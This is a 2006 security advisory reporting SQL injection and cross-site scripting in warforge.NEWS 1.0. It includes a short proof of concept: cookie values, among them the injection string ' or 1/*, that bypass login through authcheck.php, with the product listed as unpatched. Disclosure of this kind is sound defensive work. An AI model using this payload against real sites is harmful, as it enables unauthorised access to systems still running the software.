SQL Injection and Multiple XSS in warforge.NEWS
Summary
- Vulnerability
- SQL Injection and Multiple XSS in warforge.NEWS
- Discovered
- 2006.04.14
- Last Update
- 2006.04.24 Exploitation code published
- ID
- EV0125
- CVE
- CVE-2006-1817 CVE-2006-1818
- Risk Level
- medium
- Type
- Multiple Vulnerabilities
- Status
- Unpatched. No reply from developer(s)
- Vendor
- n/a
- Vulnerable Software
- warforge.NEWS (http://www.thewarforge.com/)
- Version
- 1.0
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple Vulnerabilities found in warforge.NEWS (http://www.thewarforge.com/) script.
Vulnerable script: authcheck.php
Cookie variable $_COOKIE[authusername] is not properly sanitized before being used in SQL query. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc = off
PoC/Exploit
Authorization Bypass Example:
URL: http://[host]/news/index.php
Cookie values:
- authusername=' or 1/*
- authaccess=1
- authemail=qwe@qqwe.com
- authpassword=any
- authfirst_name=any
- authlast_name=any
- authaccess=3
Solution.
Solution for "SQL Injection and Multiple XSS in warforge.NEWS" is not available. Check vendor's website for updates.